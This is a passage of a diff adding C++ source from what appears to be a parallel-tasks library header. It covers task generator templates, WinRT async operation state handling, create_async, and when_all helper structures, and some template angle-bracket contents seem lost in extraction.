task<_ReturnType>( + [=]() -> _ReturnType { + _Task_generator_oversubscriber_t _Oversubscriber; + (_Oversubscriber); + return _Func(); + }, + _taskOptinos); + } +#pragma warning(pop) + + template + static task<_ReturnType> _GenerateTask_1C(const _Function& _Func, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + task_options _taskOptinos(_Cts.get_token()); + details::_get_internal_task_options(_taskOptinos)._set_creation_callstack(_callstack); + return task<_ReturnType>( + [=]() -> _ReturnType { + _Task_generator_oversubscriber_t _Oversubscriber; + (_Oversubscriber); + return _Func(_Cts.get_token()); + }, + _taskOptinos); + } + + template + static task<_ReturnType> _GenerateTask_1P(const _Function& _Func, + const _ProgressObject& _Progress, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + task_options _taskOptinos(_Cts.get_token()); + details::_get_internal_task_options(_taskOptinos)._set_creation_callstack(_callstack); + return task<_ReturnType>( + [=]() -> _ReturnType { + _Task_generator_oversubscriber_t _Oversubscriber; + (_Oversubscriber); + return _Func(_Progress); + }, + _taskOptinos); + } + + template + static task<_ReturnType> _GenerateTask_2PC(const _Function& _Func, + const _ProgressObject& _Progress, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + task_options _taskOptinos(_Cts.get_token()); + details::_get_internal_task_options(_taskOptinos)._set_creation_callstack(_callstack); + return task<_ReturnType>( + [=]() -> _ReturnType { + _Task_generator_oversubscriber_t _Oversubscriber; + (_Oversubscriber); + return _Func(_Progress, _Cts.get_token()); + }, + _taskOptinos); + } +}; + +template<> +struct _SelectorTaskGenerator<_TypeSelectorNoAsync, void> +{ + template + static task _GenerateTask_0(const _Function& _Func, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + task_options _taskOptinos(_Cts.get_token()); + details::_get_internal_task_options(_taskOptinos)._set_creation_callstack(_callstack); + return task( + [=]() { + _Task_generator_oversubscriber_t _Oversubscriber; + (_Oversubscriber); + _Func(); + }, + _taskOptinos); + } + + template + static task _GenerateTask_1C(const _Function& _Func, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + task_options _taskOptinos(_Cts.get_token()); + details::_get_internal_task_options(_taskOptinos)._set_creation_callstack(_callstack); + return task( + [=]() { + _Task_generator_oversubscriber_t _Oversubscriber; + (_Oversubscriber); + _Func(_Cts.get_token()); + }, + _taskOptinos); + } + + template + static task _GenerateTask_1P(const _Function& _Func, + const _ProgressObject& _Progress, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + task_options _taskOptinos(_Cts.get_token()); + details::_get_internal_task_options(_taskOptinos)._set_creation_callstack(_callstack); + return task( + [=]() { + _Task_generator_oversubscriber_t _Oversubscriber; + (_Oversubscriber); + _Func(_Progress); + }, + _taskOptinos); + } + + template + static task _GenerateTask_2PC(const _Function& _Func, + const _ProgressObject& _Progress, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + task_options _taskOptinos(_Cts.get_token()); + details::_get_internal_task_options(_taskOptinos)._set_creation_callstack(_callstack); + return task( + [=]() { + _Task_generator_oversubscriber_t _Oversubscriber; + (_Oversubscriber); + _Func(_Progress, _Cts.get_token()); + }, + _taskOptinos); + } +}; + +// +// Functor returns a task - the task can directly be returned: +// +template +struct _SelectorTaskGenerator<_TypeSelectorAsyncTask, _ReturnType> +{ + template + static task<_ReturnType> _GenerateTask_0(const _Function& _Func, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + return _Func(); + } + + template + static task<_ReturnType> _GenerateTask_1C(const _Function& _Func, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + return _Func(_Cts.get_token()); + } + + template + static task<_ReturnType> _GenerateTask_1P(const _Function& _Func, + const _ProgressObject& _Progress, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + return _Func(_Progress); + } + + template + static task<_ReturnType> _GenerateTask_2PC(const _Function& _Func, + const _ProgressObject& _Progress, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + return _Func(_Progress, _Cts.get_token()); + } +}; + +template<> +struct _SelectorTaskGenerator<_TypeSelectorAsyncTask, void> +{ + template + static task _GenerateTask_0(const _Function& _Func, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + return _Func(); + } + + template + static task _GenerateTask_1C(const _Function& _Func, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + return _Func(_Cts.get_token()); + } + + template + static task _GenerateTask_1P(const _Function& _Func, + const _ProgressObject& _Progress, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + return _Func(_Progress); + } + + template + static task _GenerateTask_2PC(const _Function& _Func, + const _ProgressObject& _Progress, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + return _Func(_Progress, _Cts.get_token()); + } +}; + +template +struct _TaskGenerator +{ +}; + +template +struct _TaskGenerator<_Generator, false, false> +{ + template + static auto _GenerateTask(const _Function& _Func, + _ClassPtr _Ptr, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + -> decltype(_Generator::_GenerateTask_0(_Func, _Cts, _callstack)) + { + return _Generator::_GenerateTask_0(_Func, _Cts, _callstack); + } +}; + +template +struct _TaskGenerator<_Generator, true, false> +{ + template + static auto _GenerateTask(const _Function& _Func, + _ClassPtr _Ptr, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + -> decltype(_Generator::_GenerateTask_0(_Func, _Cts, _callstack)) + { + return _Generator::_GenerateTask_1C(_Func, _Cts, _callstack); + } +}; + +template +struct _TaskGenerator<_Generator, false, true> +{ + template + static auto _GenerateTask(const _Function& _Func, + _ClassPtr _Ptr, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + -> decltype(_Generator::_GenerateTask_0(_Func, _Cts, _callstack)) + { + return _Generator::_GenerateTask_1P( + _Func, progress_reporter<_ProgressType>::_CreateReporter(_Ptr), _Cts, _callstack); + } +}; + +template +struct _TaskGenerator<_Generator, true, true> +{ + template + static auto _GenerateTask(const _Function& _Func, + _ClassPtr _Ptr, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + -> decltype(_Generator::_GenerateTask_0(_Func, _Cts, _callstack)) + { + return _Generator::_GenerateTask_2PC( + _Func, progress_reporter<_ProgressType>::_CreateReporter(_Ptr), _Cts, _callstack); + } +}; + +// *************************************************************************** +// Async Operation Attributes Classes +// +// These classes are passed through the hierarchy of async base classes in order to hold multiple attributes of a given +// async construct in a single container. An attribute class must define: +// +// Mandatory: +// ------------------------- +// +// _AsyncBaseType : The Windows Runtime interface which is being implemented. +// _CompletionDelegateType : The Windows Runtime completion delegate type for the interface. +// _ProgressDelegateType : If _TakesProgress is true, the Windows Runtime progress delegate type for the interface. +// If it is false, an empty Windows Runtime type. _ReturnType : The return type of the async construct +// (void for actions / non-void for operations) +// +// _TakesProgress : An indication as to whether or not +// +// _Generate_Task : A function adapting the user's function into what's necessary to produce the appropriate +// task +// +// Optional: +// ------------------------- +// + +template +struct _AsyncAttributes +{ +}; + +template +struct _AsyncAttributes<_Function, _ProgressType, _ReturnType, _TaskTraits, _TakesToken, true> +{ + typedef typename Windows::Foundation::IAsyncOperationWithProgress<_ReturnType, _ProgressType> _AsyncBaseType; + typedef typename Windows::Foundation::AsyncOperationProgressHandler<_ReturnType, _ProgressType> + _ProgressDelegateType; + typedef typename Windows::Foundation::AsyncOperationWithProgressCompletedHandler<_ReturnType, _ProgressType> + _CompletionDelegateType; + typedef typename _ReturnType _ReturnType; + typedef typename _ProgressType _ProgressType; + typedef typename _TaskTraits::_AsyncKind _AsyncKind; + typedef typename _SelectorTaskGenerator<_AsyncKind, _ReturnType> _SelectorTaskGenerator; + typedef typename _TaskGenerator<_SelectorTaskGenerator, _TakesToken, true> _TaskGenerator; + + static const bool _TakesProgress = true; + static const bool _TakesToken = _TakesToken; + + template + static task<_ReturnType> _Generate_Task(const _Function& _Func, + _ClassPtr _Ptr, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + return _TaskGenerator::_GenerateTask<_Function, _ClassPtr, _ProgressType>(_Func, _Ptr, _Cts, _callstack); + } +}; + +template +struct _AsyncAttributes<_Function, _ProgressType, _ReturnType, _TaskTraits, _TakesToken, false> +{ + typedef typename Windows::Foundation::IAsyncOperation<_ReturnType> _AsyncBaseType; + typedef _Zip _ProgressDelegateType; + typedef typename Windows::Foundation::AsyncOperationCompletedHandler<_ReturnType> _CompletionDelegateType; + typedef typename _ReturnType _ReturnType; + typedef typename _TaskTraits::_AsyncKind _AsyncKind; + typedef typename _SelectorTaskGenerator<_AsyncKind, _ReturnType> _SelectorTaskGenerator; + typedef typename _TaskGenerator<_SelectorTaskGenerator, _TakesToken, false> _TaskGenerator; + + static const bool _TakesProgress = false; + static const bool _TakesToken = _TakesToken; + + template + static task<_ReturnType> _Generate_Task(const _Function& _Func, + _ClassPtr _Ptr, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + return _TaskGenerator::_GenerateTask<_Function, _ClassPtr, _ProgressType>(_Func, _Ptr, _Cts, _callstack); + } +}; + +template +struct _AsyncAttributes<_Function, _ProgressType, void, _TaskTraits, _TakesToken, true> +{ + typedef typename Windows::Foundation::IAsyncActionWithProgress<_ProgressType> _AsyncBaseType; + typedef typename Windows::Foundation::AsyncActionProgressHandler<_ProgressType> _ProgressDelegateType; + typedef typename Windows::Foundation::AsyncActionWithProgressCompletedHandler<_ProgressType> + _CompletionDelegateType; + typedef void _ReturnType; + typedef typename _ProgressType _ProgressType; + typedef typename _TaskTraits::_AsyncKind _AsyncKind; + typedef typename _SelectorTaskGenerator<_AsyncKind, _ReturnType> _SelectorTaskGenerator; + typedef typename _TaskGenerator<_SelectorTaskGenerator, _TakesToken, true> _TaskGenerator; + + static const bool _TakesProgress = true; + static const bool _TakesToken = _TakesToken; + + template + static task<_ReturnType> _Generate_Task(const _Function& _Func, + _ClassPtr _Ptr, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + return _TaskGenerator::_GenerateTask<_Function, _ClassPtr, _ProgressType>(_Func, _Ptr, _Cts, _callstack); + } +}; + +template +struct _AsyncAttributes<_Function, _ProgressType, void, _TaskTraits, _TakesToken, false> +{ + typedef typename Windows::Foundation::IAsyncAction _AsyncBaseType; + typedef _Zip _ProgressDelegateType; + typedef typename Windows::Foundation::AsyncActionCompletedHandler _CompletionDelegateType; + typedef void _ReturnType; + typedef typename _TaskTraits::_AsyncKind _AsyncKind; + typedef typename _SelectorTaskGenerator<_AsyncKind, _ReturnType> _SelectorTaskGenerator; + typedef typename _TaskGenerator<_SelectorTaskGenerator, _TakesToken, false> _TaskGenerator; + + static const bool _TakesProgress = false; + static const bool _TakesToken = _TakesToken; + + template + static task<_ReturnType> _Generate_Task(const _Function& _Func, + _ClassPtr _Ptr, + cancellation_token_source _Cts, + const _TaskCreationCallstack& _callstack) + { + return _TaskGenerator::_GenerateTask<_Function, _ClassPtr, _ProgressType>(_Func, _Ptr, _Cts, _callstack); + } +}; + +template +struct _AsyncLambdaTypeTraits +{ + typedef typename _FunctorTypeTraits<_Function>::_ReturnType _ReturnType; + typedef typename _FunctorTypeTraits<_Function>::_Argument1Type _Argument1Type; + typedef typename _CAFunctorOptions<_Function>::_ProgressType _ProgressType; + + static const bool _TakesProgress = _CAFunctorOptions<_Function>::_TakesProgress; + static const bool _TakesToken = _CAFunctorOptions<_Function>::_TakesToken; + + typedef typename _TaskTypeTraits<_ReturnType> _TaskTraits; + typedef typename _AsyncAttributes<_Function, + _ProgressType, + typename _TaskTraits::_TaskRetType, + _TaskTraits, + _TakesToken, + _TakesProgress> + _AsyncAttributes; +}; + +// *************************************************************************** +// AsyncInfo (and completion) Layer: +// + +// +// Internal base class implementation for async operations (based on internal Windows representation for ABI level async +// operations) +// +template +ref class _AsyncInfoBase abstract : _Attributes::_AsyncBaseType +{ + internal : + + _AsyncInfoBase() + : _M_currentStatus(_AsyncStatusInternal::_AsyncCreated) + , _M_errorCode(S_OK) + , _M_completeDelegate(nullptr) + , _M_CompleteDelegateAssigned(0) + , _M_CallbackMade(0) + { + _M_id = ::pplx::details::platform::GetNextAsyncId(); + } + +public: + virtual typename _Attributes::_ReturnType GetResults() + { + throw ::Platform::Exception::CreateException(E_UNEXPECTED); + } + + virtual property unsigned int Id + { + unsigned int get() + { + _CheckValidStateForAsyncInfoCall(); + + return _M_id; + } + + void set(unsigned int id) + { + _CheckValidStateForAsyncInfoCall(); + + if (id == 0) + { + throw ::Platform::Exception::CreateException(E_INVALIDARG); + } + else if (_M_currentStatus != _AsyncStatusInternal::_AsyncCreated) + { + throw ::Platform::Exception::CreateException(E_ILLEGAL_METHOD_CALL); + } + + _M_id = id; + } + } + + virtual property Windows::Foundation::AsyncStatus Status + { + Windows::Foundation::AsyncStatus get() + { + _CheckValidStateForAsyncInfoCall(); + + _AsyncStatusInternal _Current = _M_currentStatus; + + // + // Map our internal cancel pending to canceled. This way "pending canceled" looks to the outside as + // "canceled" but can still transition to "completed" if the operation completes without acknowledging the + // cancellation request + // + switch (_Current) + { + case _AsyncCancelPending: _Current = _AsyncCanceled; break; + case _AsyncCreated: _Current = _AsyncStarted; break; + default: break; + } + + return static_cast(_Current); + } + } + + virtual property Windows::Foundation::HResult ErrorCode + { + Windows::Foundation::HResult get() + { + _CheckValidStateForAsyncInfoCall(); + + Windows::Foundation::HResult _Hr; + _Hr.Value = _M_errorCode; + return _Hr; + } + } + + virtual property typename _Attributes::_ProgressDelegateType ^ + Progress { + typename typename _Attributes::_ProgressDelegateType ^ get() { return _GetOnProgress(); } + + void set(typename _Attributes::_ProgressDelegateType ^ _ProgressHandler) + { + _PutOnProgress(_ProgressHandler); + } + } + + virtual void + Cancel() + { + if (_TransitionToState(_AsyncCancelPending)) + { + _OnCancel(); + } + } + + virtual void Close() + { + if (_TransitionToState(_AsyncClosed)) + { + _OnClose(); + } + else + { + if (_M_currentStatus != _AsyncClosed) // Closed => Closed transition is just ignored + { + throw ::Platform::Exception::CreateException(E_ILLEGAL_STATE_CHANGE); + } + } + } + + virtual property typename _Attributes::_CompletionDelegateType ^ + Completed { + typename _Attributes::_CompletionDelegateType ^ + get() { + _CheckValidStateForDelegateCall(); + return _M_completeDelegate; + } + + void set(typename _Attributes::_CompletionDelegateType ^ _CompleteHandler) + { + _CheckValidStateForDelegateCall(); + // this delegate property is "write once" + if (InterlockedIncrement(&_M_CompleteDelegateAssigned) == 1) + { + _M_completeDelegateContext = _ContextCallback::_CaptureCurrent(); + _M_completeDelegate = _CompleteHandler; + // Guarantee that the write of _M_completeDelegate is ordered with respect to the read of state + // below as perceived from _FireCompletion on another thread. + MemoryBarrier(); + if (_IsTerminalState()) + { + _FireCompletion(); + } + } + else + { + throw ::Platform::Exception::CreateException(E_ILLEGAL_DELEGATE_ASSIGNMENT); + } + } + } + + protected private : + + // _Start - this is not externally visible since async operations "hot start" before returning to the caller + void + _Start() + { + if (_TransitionToState(_AsyncStarted)) + { + _OnStart(); + } + else + { + throw ::Platform::Exception::CreateException(E_ILLEGAL_STATE_CHANGE); + } + } + + void _FireCompletion() + { + _TryTransitionToCompleted(); + + // we guarantee that completion can only ever be fired once + if (_M_completeDelegate != nullptr && InterlockedIncrement(&_M_CallbackMade) == 1) + { + _M_completeDelegateContext._CallInContext([=] { + _M_completeDelegate((_Attributes::_AsyncBaseType ^) this, this->Status); + _M_completeDelegate = nullptr; + }); + } + } + + virtual typename _Attributes::_ProgressDelegateType ^ + _GetOnProgress() { throw ::Platform::Exception::CreateException(E_UNEXPECTED); } + + virtual void _PutOnProgress(typename _Attributes::_ProgressDelegateType ^ _ProgressHandler) + { + throw ::Platform::Exception::CreateException(E_UNEXPECTED); + } + + bool _TryTransitionToCompleted() { return _TransitionToState(_AsyncStatusInternal::_AsyncCompleted); } + + bool _TryTransitionToCancelled() { return _TransitionToState(_AsyncStatusInternal::_AsyncCanceled); } + + bool _TryTransitionToError(const HRESULT error) + { + _InterlockedCompareExchange(reinterpret_cast(&_M_errorCode), error, S_OK); + return _TransitionToState(_AsyncStatusInternal::_AsyncError); + } + + // This method checks to see if the delegate properties can be + // modified in the current state and generates the appropriate + // error hr in the case of violation. + inline void _CheckValidStateForDelegateCall() + { + if (_M_currentStatus == _AsyncClosed) + { + throw ::Platform::Exception::CreateException(E_ILLEGAL_METHOD_CALL); + } + } + + // This method checks to see if results can be collected in the + // current state and generates the appropriate error hr in + // the case of a violation. + inline void _CheckValidStateForResultsCall() + { + _AsyncStatusInternal _Current = _M_currentStatus; + + if (_Current == _AsyncError) + { + throw ::Platform::Exception::CreateException(_M_errorCode); + } +#pragma warning(push) +#pragma warning(disable : 4127) // Conditional expression is constant + // single result illegal before transition to Completed or Cancelled state + if (resultType == SingleResult) +#pragma warning(pop) + { + if (_Current != _AsyncCompleted) + { + throw ::Platform::Exception::CreateException(E_ILLEGAL_METHOD_CALL); + } + } + // multiple results can be called after Start has been called and before/after Completed + else if (_Current != _AsyncStarted && _Current != _AsyncCancelPending && _Current != _AsyncCanceled && + _Current != _AsyncCompleted) + { + throw ::Platform::Exception::CreateException(E_ILLEGAL_METHOD_CALL); + } + } + + // This method can be called by derived classes periodically to determine + // whether the asynchronous operation should continue processing or should + // be halted. + inline bool _ContinueAsyncOperation() { return (_M_currentStatus == _AsyncStarted); } + + // These two methods are used to allow the async worker implementation do work on + // state transitions. No real "work" should be done in these methods. In other words + // they should not block for a long time on UI timescales. + virtual void _OnStart() = 0; + virtual void _OnClose() = 0; + virtual void _OnCancel() = 0; + +private: + // This method is used to check if calls to the AsyncInfo properties + // (id, status, errorcode) are legal in the current state. It also + // generates the appropriate error hr to return in the case of an + // illegal call. + inline void _CheckValidStateForAsyncInfoCall() + { + _AsyncStatusInternal _Current = _M_currentStatus; + if (_Current == _AsyncClosed) + { + throw ::Platform::Exception::CreateException(E_ILLEGAL_METHOD_CALL); + } + else if (_Current == _AsyncCreated) + { + throw ::Platform::Exception::CreateException(E_ASYNC_OPERATION_NOT_STARTED); + } + } + + inline bool _TransitionToState(const _AsyncStatusInternal _NewState) + { + _AsyncStatusInternal _Current = _M_currentStatus; + + // This enforces the valid state transitions of the asynchronous worker object + // state machine. + switch (_NewState) + { + case _AsyncStatusInternal::_AsyncStarted: + if (_Current != _AsyncCreated) + { + return false; + } + break; + case _AsyncStatusInternal::_AsyncCompleted: + if (_Current != _AsyncStarted && _Current != _AsyncCancelPending) + { + return false; + } + break; + case _AsyncStatusInternal::_AsyncCancelPending: + if (_Current != _AsyncStarted) + { + return false; + } + break; + case _AsyncStatusInternal::_AsyncCanceled: + if (_Current != _AsyncStarted && _Current != _AsyncCancelPending) + { + return false; + } + break; + case _AsyncStatusInternal::_AsyncError: + if (_Current != _AsyncStarted && _Current != _AsyncCancelPending) + { + return false; + } + break; + case _AsyncStatusInternal::_AsyncClosed: + if (!_IsTerminalState(_Current)) + { + return false; + } + break; + default: return false; break; + } + + // attempt the transition to the new state + // Note: if currentStatus_ == _Current, then there was no intervening write + // by the async work object and the swap succeeded. + _AsyncStatusInternal _RetState = static_cast<_AsyncStatusInternal>(_InterlockedCompareExchange( + reinterpret_cast(&_M_currentStatus), _NewState, static_cast(_Current))); + + // ICE returns the former state, if the returned state and the + // state we captured at the beginning of this method are the same, + // the swap succeeded. + return (_RetState == _Current); + } + + inline bool _IsTerminalState() { return _IsTerminalState(_M_currentStatus); } + + inline bool _IsTerminalState(_AsyncStatusInternal status) + { + return (status == _AsyncError || status == _AsyncCanceled || status == _AsyncCompleted || + status == _AsyncClosed); + } + +private: + _ContextCallback _M_completeDelegateContext; + typename _Attributes::_CompletionDelegateType ^ volatile _M_completeDelegate; + _AsyncStatusInternal volatile _M_currentStatus; + HRESULT volatile _M_errorCode; + unsigned int _M_id; + long volatile _M_CompleteDelegateAssigned; + long volatile _M_CallbackMade; +}; + +// *************************************************************************** +// Progress Layer (optional): +// + +template +ref class _AsyncProgressBase abstract : _AsyncInfoBase<_Attributes, _ResultType> +{ +}; + +template +ref class _AsyncProgressBase<_Attributes, true, _ResultType> abstract : _AsyncInfoBase<_Attributes, _ResultType> +{ + internal : + + _AsyncProgressBase() + : _AsyncInfoBase<_Attributes, _ResultType>(), _M_progressDelegate(nullptr) + { + } + + virtual typename _Attributes::_ProgressDelegateType ^ _GetOnProgress() override + { + _CheckValidStateForDelegateCall(); + return _M_progressDelegate; + } + + virtual void _PutOnProgress(typename _Attributes::_ProgressDelegateType ^ _ProgressHandler) override + { + _CheckValidStateForDelegateCall(); + _M_progressDelegate = _ProgressHandler; + _M_progressDelegateContext = _ContextCallback::_CaptureCurrent(); + } + + void _FireProgress(const typename _Attributes::_ProgressType& _ProgressValue) + { + if (_M_progressDelegate != nullptr) + { + _M_progressDelegateContext._CallInContext( + [=] { _M_progressDelegate((_Attributes::_AsyncBaseType ^) this, _ProgressValue); }); + } + } + +private: + _ContextCallback _M_progressDelegateContext; + typename _Attributes::_ProgressDelegateType ^ _M_progressDelegate; +}; + +template +ref class _AsyncBaseProgressLayer abstract : _AsyncProgressBase<_Attributes, _Attributes::_TakesProgress, _ResultType> +{ +}; + +// *************************************************************************** +// Task Adaptation Layer: +// + +// +// _AsyncTaskThunkBase provides a bridge between IAsync and task. +// +template +ref class _AsyncTaskThunkBase abstract : _AsyncBaseProgressLayer<_Attributes> +{ +public: + virtual _ReturnType GetResults() override + { + _CheckValidStateForResultsCall(); + return _M_task.get(); + } + + internal : + + typedef task<_ReturnType> + _TaskType; + + _AsyncTaskThunkBase(const _TaskType& _Task) : _M_task(_Task) {} + + _AsyncTaskThunkBase() {} + +protected: + virtual void _OnStart() override + { + _M_task.then([=](_TaskType _Antecedent) { + try + { + _Antecedent.get(); + } + catch (task_canceled&) + { + _TryTransitionToCancelled(); + } + catch (::Platform::Exception ^ _Ex) + { + _TryTransitionToError(_Ex->HResult); + } + catch (...) + { + _TryTransitionToError(E_FAIL); + } + _FireCompletion(); + }); + } + + internal : + + _TaskType _M_task; + cancellation_token_source _M_cts; +}; + +template +ref class _AsyncTaskThunk : _AsyncTaskThunkBase<_Attributes, typename _Attributes::_ReturnType> +{ + internal : + + _AsyncTaskThunk(const _TaskType& _Task) + : _AsyncTaskThunkBase(_Task) + { + } + + _AsyncTaskThunk() {} + +protected: + virtual void _OnClose() override {} + + virtual void _OnCancel() override { _M_cts.cancel(); } +}; + +// *************************************************************************** +// Async Creation Layer: +// +template +ref class _AsyncTaskGeneratorThunk sealed + : _AsyncTaskThunk::_AsyncAttributes> +{ + internal : + + typedef typename _AsyncLambdaTypeTraits<_Function>::_AsyncAttributes _Attributes; + typedef typename _AsyncTaskThunk<_Attributes> _Base; + typedef typename _Attributes::_AsyncBaseType _AsyncBaseType; + + _AsyncTaskGeneratorThunk(const _Function& _Func, const _TaskCreationCallstack& _callstack) + : _M_func(_Func), _M_creationCallstack(_callstack) + { + // Virtual call here is safe as the class is declared 'sealed' + _Start(); + } + +protected: + // + // The only thing we must do different from the base class is we must spin the hot task on transition from + // Created->Started. Otherwise, let the base thunk handle everything. + // + + virtual void _OnStart() override + { + // + // Call the appropriate task generator to actually produce a task of the expected type. This might adapt the + // user lambda for progress reports, wrap the return result in a task, or allow for direct return of a task + // depending on the form of the lambda. + // + _M_task = _Attributes::_Generate_Task(_M_func, this, _M_cts, _M_creationCallstack); + _Base::_OnStart(); + } + + virtual void _OnCancel() override { _Base::_OnCancel(); } + +private: + _TaskCreationCallstack _M_creationCallstack; + _Function _M_func; +}; +} // namespace details + +/// +/// Creates a Windows Runtime asynchronous construct based on a user supplied lambda or function object. The return +/// type of create_async is one of either IAsyncAction^, +/// IAsyncActionWithProgress<TProgress>^, IAsyncOperation<TResult>^, or +/// IAsyncOperationWithProgress<TResult, TProgress>^ based on the signature of the lambda passed to the +/// method. +/// +/// +/// The lambda or function object from which to create a Windows Runtime asynchronous construct. +/// +/// +/// An asynchronous construct represented by an IAsyncAction^, IAsyncActionWithProgress<TProgress>^, +/// IAsyncOperation<TResult>^, or an IAsyncOperationWithProgress<TResult, TProgress>^. The interface +/// returned depends on the signature of the lambda passed into the function. +/// +/// +/// The return type of the lambda determines whether the construct is an action or an operation. +/// Lambdas that return void cause the creation of actions. Lambdas that return a result of type +/// TResult cause the creation of operations of TResult. The lambda may also return a +/// task<TResult> which encapsulates the asynchronous work within itself or is the continuation of a +/// chain of tasks that represent the asynchronous work. In this case, the lambda itself is executed inline, since +/// the tasks are the ones that execute asynchronously, and the return type of the lambda is unwrapped to produce +/// the asynchronous construct returned by create_async. This implies that a lambda that returns a +/// task<void> will cause the creation of actions, and a lambda that returns a task<TResult> will cause +/// the creation of operations of TResult. The lambda may take either zero, one or two arguments. The +/// valid arguments are progress_reporter<TProgress> and cancellation_token, in that order if +/// both are used. A lambda without arguments causes the creation of an asynchronous construct without the +/// capability for progress reporting. A lambda that takes a progress_reporter<TProgress> will cause +/// create_async to return an asynchronous construct which reports progress of type TProgress each time the +/// report method of the progress_reporter object is called. A lambda that takes a cancellation_token may use +/// that token to check for cancellation, or pass it to tasks that it creates so that cancellation of the +/// asynchronous construct causes cancellation of those tasks. +/// If the body of the lambda or function object returns a result (and not a task<TResult>), the lambda +/// will be executed asynchronously within the process MTA in the context of a task the Runtime implicitly creates +/// for it. The IAsyncInfo::Cancel method will cause cancellation of the implicit task. If the +/// body of the lambda returns a task, the lambda executes inline, and by declaring the lambda to take an argument +/// of type cancellation_token you can trigger cancellation of any tasks you create within the lambda by +/// passing that token in when you create them. You may also use the register_callback method on the token to +/// cause the Runtime to invoke a callback when you call IAsyncInfo::Cancel on the async operation or action +/// produced.. This function is only available to Windows Store apps. +/// +/// +/// +/// +/**/ +template + __declspec(noinline) details::_AsyncTaskGeneratorThunk<_Function> ^ + create_async(const _Function& _Func) { + static_assert(std::is_same::value, + "argument to create_async must be a callable object taking zero, one or two arguments"); + return ref new details::_AsyncTaskGeneratorThunk<_Function>(_Func, PPLX_CAPTURE_CALLSTACK()); + } + +#endif /* defined (__cplusplus_winrt) */ + + namespace details +{ + // Helper struct for when_all operators to know when tasks have completed + template + struct _RunAllParam + { + _RunAllParam() : _M_completeCount(0), _M_numTasks(0) {} + + void _Resize(size_t _Len, bool _SkipVector = false) + { + _M_numTasks = _Len; + if (!_SkipVector) + { + _M_vector._Result.resize(_Len); + } + } + + task_completion_event<_Unit_type> _M_completed; + _ResultHolder> _M_vector; + _ResultHolder<_Type> _M_mergeVal; + atomic_size_t _M_completeCount; + size_t _M_numTasks; + }; + + template + struct _RunAllParam> + { + _RunAllParam() : _M_completeCount(0), _M_numTasks(0) {} + + void _Resize(size_t _Len, bool _SkipVector = false) + { + _M_numTasks = _Len; + + if (!_SkipVector) + { + _M_vector.resize(_Len); + } + } + + task_completion_event<_Unit_type> _M_completed; + std::vector<_ResultHolder>> _M_vector; + atomic_size_t _M_completeCount; + size_t _M_numTasks; + }; + + // Helper struct specialization for void + template<> + struct _RunAllParam<_Unit_type> + { + _RunAllParam() : _M_completeCount(0), _M_numTasks(0) {} + + void _Resize(size_t _Len) { _M_numTasks = _Len; } + + task_completion_event<_Unit_type> _M_completed; + atomic_size_t _M_completeCount; + size_t _M_numTasks; + }; + + inline void _JoinAllTokens_Add(const cancellation_token_source& _MergedSrc, + _CancellationTokenState* _PJoinedTokenState) + { + if (_PJoinedTokenState != nullptr && _PJoinedTokenState != _CancellationTokenState::_None()) + { + cancellation_token _T = cancellation_token::_FromImpl(_PJoinedTokenState); + _T.register_callback([=]() { _MergedSrc.cancel(); }); + } + } + + template + void _WhenAllContinuationWrapper(_RunAllParam<_ElementType> * _PParam, _Function _Func, task<_TaskType> & _Task) + { + if (_Task._GetImpl()->_IsCompleted()) + { + _Func(); + if (atomic_increment(_PParam->_M_completeCount) == _PParam->_M_numTasks) + { + // Inline execute its direct continuation, the _ReturnTask + _PParam->_M_completed.set(_Unit_type()); + // It's safe to delete it since all usage of _PParam in _ReturnTask has been finished. + delete _PParam; + } + } + else + { + _ASSERTE(_Task._GetImpl()->_IsCanceled()); + if (_Task._GetImpl()->_HasUserException()) + { + // _Cancel will return false if the TCE is already canceled with or without exception + _PParam->_M_completed._Cancel(_Task._GetImpl()->_GetExceptionHolder()); + } + else + { + _PParam->_M_completed._Cancel(); + } + + if (atomic_increment(_PParam->_M_completeCount) == _PParam->_M_numTasks) + { + delete _PParam; + } + } + } + + template + struct _WhenAllImpl + { + static task> _Perform(const task_options& _TaskOptions, + _Iterator _Begin, + _Iterator _End) + { + _CancellationTokenState* _PTokenState = + _TaskOptions.has_cancellation_token() ? _TaskOptions.get_cancellation_token()._GetImplValue() : nullptr; + + auto _PParam = new _RunAllParam<_ElementType>(); + cancellation_token_source _MergedSource; + + // Step1: Create task completion event. + task_options _Options(_TaskOptions); + _Options.set_cancellation_token(_MergedSource.get_token()); + task<_Unit_type> _All_tasks_completed(_PParam->_M_completed, _Options); + // The return task must be created before step 3 to enforce inline execution. + auto _ReturnTask = _All_tasks_completed._Then( + [=](_Unit_type) -> std::vector<_ElementType> { return _PParam->_M_vector.Get(); }, nullptr); + + // Step2: Combine and check tokens, and count elements in range. + if (_PTokenState) + { + _JoinAllTokens_Add(_MergedSource, _PTokenState); + _PParam->_Resize(static_cast(std::distance(_Begin, _End))); + } + else + { + size_t _TaskNum = 0; + for (auto _PTask = _Begin; _PTask != _End; ++_PTask) + { + _TaskNum++; + _JoinAllTokens_Add(_MergedSource, _PTask->_GetImpl()->_M_pTokenState); + } + _PParam->_Resize(_TaskNum); + } + + // Step3: Check states of previous tasks. + if (_Begin == _End) + { + _PParam->_M_completed.set(_Unit_type()); + delete _PParam; + } + else + { + size_t _Index = 0; + for (auto 